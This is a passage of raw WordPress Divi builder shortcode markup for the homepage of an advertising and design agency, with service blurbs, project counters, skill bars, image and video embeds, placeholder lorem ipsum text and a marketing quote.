custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" 